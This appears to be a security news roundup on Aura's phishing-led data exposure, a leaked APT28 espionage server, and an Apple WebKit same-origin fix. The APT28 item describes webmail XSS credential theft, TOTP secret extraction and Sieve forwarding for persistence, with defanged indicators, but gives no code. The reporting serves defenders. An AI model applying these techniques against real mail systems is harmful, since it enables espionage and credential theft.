Trending Topics

Aura’s March 2026 Incident: Targeted Account Compromise and Data Exposure

In March 2026, online safety provider Aura disclosed that a single employee account was compromised for about an hour after a targeted phone‑phishing attack. During this window, an unauthorized third party accessed roughly 900,000 records tied largely to a marketing tool inherited from a company Aura acquired in 2021. Aura’s internal investigation indicates that fewer than 20,000 active customers and fewer than 15,000 former customers had their contact information exposed, and the company continues to stress that no Social Security numbers, passwords, or financial information were accessed. The exposed data relates primarily to contact and interaction details rather than highly sensitive identity or financial fields. According to Aura, compromised data may include customer service comments, email addresses, IP addresses, names, phone numbers, and physical addresses associated with those records. All core sensitive data that underpins Aura’s protection services, such as Social Security numbers, credit files, payment information, and account credentials, remains encrypted with tightly restricted access, which Aura notes functioned as designed during the incident. After detecting the intrusion, Aura terminated access to the compromised account, activated its incident‑response procedures, engaged external cybersecurity and legal experts, and notified law enforcement. The company is notifying affected individuals and offering support, while emphasizing that it does not expect a significant increase in risk for most affected customers. Nonetheless, the nature of the exposed data means recipients should be alert to targeted phishing, scams, or social‑engineering attempts that reference their relationship with Aura or use their contact details to build credibility. Aura has publicly acknowledged that the incident fell short of its standard for providing “peace of mind” and has committed to reinforcing safeguards to maintain customer trust.

FancyBear Server Leak Exposes Live Espionage Operations

A major operational security failure has exposed a live Russian espionage server linked to APT28/FancyBear, revealing stolen credentials, 2FA secrets, and detailed targeting of European government and military networks. Researchers from Ctrl‑Alt‑Intel, building on Hunt[.]io’s “Operation Roundish” work identified an open directory on a C2 server at 203.161.50[.]145 hosted on Namecheap, containing C2 source code, payloads, logs, and exfiltrated data. Analysis of these archives uncovered more than 2,800 exfiltrated emails, over 240 credential sets (including TOTP 2FA secrets), around 140 persistent forwarding rules, and roughly 11,500 harvested contact addresses from compromised mailboxes. Victims included government and military entities in Ukraine, Romania, Bulgaria, Greece, Serbia, and North Macedonia, such as regional Ukrainian prosecutors, the Romanian Air Force, and Greece’s National Defence General Staff, many of them NATO members or closely aligned partners, aligning the campaign with Russia’s interest in Ukraine‑related logistics and support. CERT‑UA had previously tied the same IP to APT28 activity involving Roundcube exploitation and ClickFix/fake reCAPTCHA phishing chains, yet FancyBear continued using the server for roughly 500 days despite public exposure, with multiple open directories on port 8889 visible in Censys and Hunt[.]io telemetry. The root cause was a basic OPSEC lapse: leaving HTTP open directories exposed while staging payloads and storing exfiltrated data, which allowed defenders to observe toolsets and operator behavior in near real time. The recovered toolkit centers on JavaScript payloads injected into Roundcube, and, in a newer variant, SquirrelMail, via XSS, with “worker[.]js”‑family scripts able to identify logged‑in users, steal credentials via hidden forms, bulk‑exfiltrate Inbox and Sent folders, add Sieve forwarding rules, harvest address books, and extract TOTP secrets from the twofactor_gauthenticator plugin using keyTwoAuth[.]js. Another module, addRedirectMailBox[.]js, abuses ManageSieve to create persistent mail forwarding to attacker‑controlled ProtonMail accounts, maintaining long‑term access even after the initial XSS path is closed. Phishing lures used fake reCAPTCHA pages hosted on zhblz[.]com‑related domains to deliver Metasploit payloads that beaconed back to 203.161.50[.]145, and infrastructure analysis showed the server also ran Roundcube webmail, Flask‑based C2, and Ligolo‑ng for tunneling into compromised environments. For defenders, the leak stresses the need to harden and monitor webmail platforms (Roundcube/SquirrelMail), restrict or disable ManageSieve and risky plugins, and watch for indicators such as 203.161.50[.]145 and zhblz[.]com‑hosted infrastructure when hunting for APT28 activity.

Apple’s Background Security Fix Closes Dangerous WebKit Same-Origin Flaw

Apple has pushed an emergency Background Security Improvement (BSI) update to fix a critical WebKit vulnerability, CVE‑2026‑20643, that could let malicious websites bypass the Same Origin Policy on iOS and macOS devices. The flaw sits in WebKit’s Navigation API and affects Safari on iOS 26.3.1, iPadOS 26.3.1, macOS 26.3.1, and macOS 26.3.2, where specially crafted web content could break the browser’s normal cross‑site isolation. Apple says it resolved the issue by tightening input validation so harmful cross‑origin navigation attempts are blocked before they can impact sensitive browser state, and has not disclosed any evidence of exploitation in the wild so far. Because WebKit underpins Safari, many third‑party browsers on iOS and iPadOS, and numerous in‑app web views, even a single cross‑origin bug carries outsized risk. The Same Origin Policy is one of the web’s core safety rules, preventing one site from reading another site’s cookies, stored data, or active sessions; if it fails, a malicious page could interact with or exfiltrate data from other sites a user is logged into. Apple’s advisory highlights that WebKit continuously processes untrusted content and is therefore a frequent target, and that cross‑origin flaws directly attack the browser’s ability to keep data from different sites reliably separated. This WebKit fix is one of the first high‑profile uses of Apple’s relaunched BSI pipeline, which delivers small, security‑only patches between full OS releases. These updates are applied to the latest OS branches and can be installed and rolled back independently, allowing Apple to move quickly on high‑risk components like WebKit without forcing a full system upgrade. Users and admins can manage BSIs in the Privacy & Security section rather than the standard Software Update screen: on iPhone and iPad, via Settings → Privacy & Security → Background Security Improvements; on Mac, via System Settings → Privacy & Security → Background Security Improvements. Enabling options such as “Automatically Install” and “Security Responses & System Files” ensures these fixes are installed silently in the background, reducing the window in which similar web‑exposed vulnerabilities can be abused.